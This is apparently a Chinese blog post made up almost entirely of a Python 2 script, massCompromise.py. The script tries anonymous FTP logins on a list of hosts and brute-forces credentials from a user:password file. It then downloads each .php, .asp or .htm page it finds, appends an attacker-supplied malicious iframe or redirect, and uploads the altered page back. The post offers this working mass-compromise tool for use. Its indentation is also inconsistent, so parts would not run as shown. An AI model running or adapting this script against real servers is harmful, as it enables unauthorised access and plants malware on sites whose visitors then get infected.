整合攻击代码

最新推荐文章于 2024-06-28 09:33:44 发布

zwlww1

最新推荐文章于 2024-06-28 09:33:44 发布

阅读量2.7k

点赞数

#!/usr/bin/python
#coding=utf-8

import ftplib
import optparse
import time

#实现攻击
def attack(username, password, tgtHost, redirect):
	ftp = ftplib.FTP(tgtHost)
	ftp.login(username, password)
	defPages = returnDefault(ftp)
	for defPage in defPages:
		injectPage(ftp, defPage, redirect)

#验证匿名登陆
def anonLogin(hostname):
	try:
		ftp = ftplib.FTP(hostname)
		ftp.login('anonymous', '123@123.com')
		print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeded.'
		ftp.quit()
		return True
	except Exception, e:
		print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
		return False

#提取用户名密码并逐一尝试登陆
def bruteLogin(hostname, passwdFile):
	pF = open(passwdFile, 'r')
	for line in pF.readlines():
		username = line.split(':')[0]
		password = line.split(':')[1].strip('\r').strip('\n')
		print '[+] Trying: ' + username + '/' + password
		try:
			ftp = ftplib.FTP(hostname)
			ftp.login(username, password)
			print '\n[*] ' + str(hostname) + ' FTP Logon Succeded: ' + username + '/' + password
			ftp.quit()
			return (username, password)
		except Exception, e:
			pass
	print '\n[-] Could not brubrute force FTP credentials.'
	return (None, None)

#列出指定搜索的文档
def returnDefault(ftp):
	try:
		#获取目录下的文件
		dirList = ftp.nlst()
	except:
		dirList = []
		print '[-] Could not list directory contents.'
		print '[-] Skipping To Next Target.'
		return

	retList = []
	for filename in dirList:
		fn = filename.lower()
		#设定文件搜索条件
		if '.php' in fn or '.asp' in fn or '.htm' in fn or '.html' in fn:
			print '[+] Found default page: ' + filename
			retList.append(filename)
	return retList

#下载-改写-插入-上传
def injectPage(ftp, page, redirect):
	f = open(page + '.tmp', 'w')
	#下载FTP文件
	ftp.retrlines('RETR ' + page, f.write)
	print '[+] Downloaded page: ' +  page
	#写入文件
	f.write(redirect)
	f.close()
	print '[+] Injected Malicious IFrame on: ' + page
	#上传目标文件
	ftp.storlines('STOR ' + page, open(page + '.tmp'))
	print '[+] Uploaded Injected Page: ' + page

def main():
	#参数设置
	parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H <target host[s]> -r <redirect page> -f <userpass file>')
	parser.add_option('-H', dest = 'hosts', type = 'string', help = 'specift target host')
	parser.add_option('-r', dest = 'redirect', type = 'string', help = 'specift redirect page')
	parser.add_option('-f', dest = 'file', type = 'string', help = 'specify userpass file')
	(options, args) = parser.parse_args()

	#可以列出多个目标，用,分隔
	hosts = str(options.hosts).split(',')
	redirect = options.redirect
	file = options.file

	#判断主机或攻击代码是否存在
	if hosts == None or redirect == None:
		print parser.usage
		exit(0)

	#从列表中取对象，逐一验证
	for host in hosts:
		username = None
		password = None
		#验证是否可以匿名登陆
    	if anonLogin(host) == True:
    		username = 'anonymous'
    		password = '123@123.com'
    		print '[+] Using Anonymous Creds to attack'
    		attack(username, password, host, redirect)
    	#如果密码暴破文档存在
    	if file != None:
    		#验证用户名密码
    		(username, password) = bruteLogin(host, file)
    		#如果找到密码
    		if password != None:
    			print '[+] Using Cred: ' + username + '/' + password + ' to attack'
    			attack(username, password, host, redirect)

if __name__ == '__main__':
 	main()